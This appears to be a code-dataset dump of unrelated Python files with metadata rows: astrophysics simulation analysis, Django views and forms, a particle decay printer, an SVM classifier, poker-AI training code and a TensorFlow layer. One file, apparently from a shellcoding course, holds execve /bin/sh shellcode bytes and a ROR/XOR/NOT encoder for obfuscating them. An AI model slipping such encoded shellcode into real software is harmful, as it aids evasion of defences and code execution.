(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| 32.772021 | 192 | 0.552727 | 877 | 6,325 | 3.971494 | 0.297605 | 0.017227 | 0.020098 | 0.019523 | 0.109101 | 0.084984 | 0.039047 | 0.039047 | 0 | 0 | 0 | 0.062134 | 0.297708 | 6,325 | 192 | 193 | 32.942708 | 0.721972 | 0.286008 | 0 | 0.137615 | 0 | 0 | 0.080321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027523 | null | null | 0.045872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c785fce89075a58bb84f43684cf4f43e70fff95c | 3,561 | py | Python | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | 1 | 2021-11-29T14:50:09.000Z | 2021-11-29T14:50:09.000Z | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# Опять же, спасибо django за готовую форму аутентификации.
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
class index(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/homepage.html"
# В случае успеха перенаправим на главную.
success_url = "/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/homepage.html',
{'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(index, self).form_valid(form)
class contact(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/contact.html"
# В случае успеха перенаправим на главную.
success_url = "../contact/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/contact.html',
{'values': ['Звоните по телефону', 'boris@yandex.ru', '8(977)335-77-77'], 'form': form1, 'user': request.user})
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(contact, self).form_valid(form)
class registration(FormView):
form_class = forms.UserCreationForm
# Ссылка, на которую будет перенаправляться пользователь в случае успешной регистрации.
# В данном случае указана ссылка на страницу входа для зарегистрированных пользователей.
success_url = "/login/"
# Шаблон, который будет использоваться при отображении представления.
template_name = "MainApp/registration_form.html"
def form_valid(self, form):
# Создаём пользователя, если данные в форму были введены корректно.
form.save()
# Вызываем метод базового класса
return super(registration, self).form_valid(form)
class LogoutView(View):
def get(self, request):
# Выполняем выход для пользователя, запросившего данное представление.
logout(request)
# После чего, перенаправляем пользователя на главную страницу.
#return HttpResponseRedirect("/seeuagain")
return render(request, 'MainApp/quitpage.html')
class LoginFormView(FormView):
form_class = AuthenticationForm
# Аналогично регистрации, только используем шаблон аутентификации.
template_name = "MainApp/login_form.html"
# В случае успеха перенаправим на главную.
success_url = "/news"
def form_valid(self, form):
# Получаем объект пользователя на основе введённых в форму данных.
self.user = form.get_user()
# Выполняем аутентификацию пользователя.
login(self.request, self.user)
return super(LoginFormView, self).form_valid(form)
| 33.914286 | 134 | 0.686043 | 387 | 3,561 | 6.248062 | 0.307494 | 0.029777 | 0.028122 | 0.026468 | 0.568652 | 0.510753 | 0.484285 | 0.484285 | 0.484285 | 0.424731 | 0 | 0.005492 | 0.233081 | 3,561 | 104 | 135 | 34.240385 | 0.879897 | 0.335861 | 0 | 0.352941 | 0 | 0 | 0.112104 | 0.051809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0 | 0.156863 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c787d4b85054cce4a273d4cda061e7e65933333a | 3,351 | py | Python | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | # Benedikt Hegner, DESY
# benedikt.hegner@cern.ch
#
# this tool is based on Luca Lista's tree drawer module
class ParticleDecayDrawer(object):
"""Draws particle decay tree """
def __init__(self):
print "Init particleDecayDrawer"
# booleans: printP4 printPtEtaPhi printVertex
def _accept(self, candidate, skipList):
if candidate in skipList: return False;
return self._select(candidate)
def _select(self, candidate):
return candidate.status() == 3
def _hasValidDaughters(self, candidate):
nDaughters = candidate.numChildren()
for i in xrange(nDaughters):
if self._select(candidate.listChildren()[i]): return True
return False
def _printP4(self, candidate):
return " "
def _decay(self, candidate, skipList):
out = str()
if candidate in skipList:
return ""
skipList.append(candidate)
id = candidate.pdg_id()
# here the part about the names :-(
out += str(id) + self._printP4(candidate)
validDau = 0
nOfDaughters = candidate.numChildren()
for i in xrange(nOfDaughters):
if self._accept(candidate.listChildren()[i], skipList): validDau+=1
if validDau == 0: return out
out += " ->"
for i in xrange(nOfDaughters):
d = candidate.listChildren()[i]
if self._accept(d, skipList):
decString = self._decay(d, skipList)
if ("->" in decString): out += " ( %s ) " %decString
else: out += " %s" %decString
return out
def draw(self, particles):
""" draw decay tree from list(HepMC.GenParticles)"""
skipList = []
nodesList = []
momsList = []
for particle in particles:
if particle.numParents() > 1:
if self._select(particle):
skipList.append(particle)
nodesList.append(particle)
for j in xrange(particle.numParents()):
mom = particle.listParents()[j]
while (mom.mother()):# != None ):
mom = mom.mother()
if self._select(mom):
momsList.append(mom)
print "-- decay --"
if len(momsList) > 0:
if len(momsList) > 1:
for m in xrange(len(momsList)):
decString = self._decay( momsList[m], skipList)
if len(decString) > 0:
print "{ %s } " %decString
else:
print self._decay(momsList[0], skipList)
if len(nodesList) > 0:
print "-> "
if len(nodesList) > 1:
for node in nodesList:
skipList.remove(node)
decString = self._decay(node, skipList)
if len(decString) > 0:
if "->" in decString: print " ( %s ) " %decString
else: print " " + decString
else:
skipList.remove(nodesList[0])
print self._decay(nodesList[0], skipList)
print
| 33.848485 | 81 | 0.497165 | 310 | 3,351 | 5.303226 | 0.270968 | 0.018248 | 0.010949 | 0.021898 | 0.150852 | 0.038929 | 0 | 0 | 0 | 0 | 0 | 0.008487 | 0.402268 | 3,351 | 98 | 82 | 34.193878 | 0.812282 | 0.057296 | 0 | 0.111111 | 0 | 0 | 0.023802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.152778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 | 225 | 1,262 | 4.04 | 0.306667 | 0.035204 | 0.036304 | 0.030803 | 0.168317 | 0.09791 | 0.088009 | 0.080308 | 0.066007 | 0.066007 | 0 | 0.039301 | 0.09271 | 1,262 | 37 | 104 | 34.108108 | 0.754585 | 0.09271 | 0 | 0 | 0 | 0 | 0.059649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.12 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
] | 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| 28.2 | 69 | 0.758865 | 37 | 282 | 5.621622 | 0.72973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008368 | 0.152482 | 282 | 9 | 70 | 31.333333 | 0.861925 | 0 | 0 | 0 | 0 | 0 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| 54.766667 | 119 | 0.370663 | 240 | 3,286 | 4.725 | 0.533333 | 0.048501 | 0.039683 | 0.035273 | 0.045855 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031734 | 0.587645 | 3,286 | 59 | 120 | 55.694915 | 0.805166 | 0.058125 | 0 | 0.122449 | 0 | 0 | 0.016526 | 0.006805 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.183673 | 0 | 0.183673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
| 27.72 | 78 | 0.681097 | 88 | 693 | 5.011364 | 0.431818 | 0.081633 | 0.088435 | 0.086168 | 0.104308 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003717 | 0.223665 | 693 | 24 | 79 | 28.875 | 0.815985 | 0 | 0 | 0 | 0 | 0 | 0.036075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0.117647 | 0.117647 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| 23.684211 | 86 | 0.622222 | 65 | 450 | 4.2 | 0.538462 | 0.058608 | 0.07326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295556 | 450 | 18 | 87 | 25 | 0.861199 | 0.128889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 | 164 | 1,172 | 3.963415 | 0.481707 | 0.064615 | 0.061538 | 0.055385 | 0.129231 | 0.083077 | 0 | 0 | 0 | 0 | 0 | 0.080698 | 0.217577 | 1,172 | 49 | 103 | 23.918367 | 0.628135 | 0.116041 | 0 | 0 | 0 | 0.037037 | 0.336249 | 0.097182 | 0 | 0 | 0.023324 | 0 | 0 | 0 | null | null | 0 | 0.037037 | null | null | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7a9038c8840f231377e3ea552d065f35efee699 | 289 | py | Python | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | null | null | null | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | 33 | 2021-07-11T22:55:42.000Z | 2022-01-07T23:23:43.000Z | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
] | null | null | null | def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0]
| 36.125 | 105 | 0.650519 | 47 | 289 | 3.87234 | 0.574468 | 0.175824 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004167 | 0.16955 | 289 | 7 | 106 | 41.285714 | 0.754167 | 0 | 0 | 0 | 0 | 0 | 0.148789 | 0.138408 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
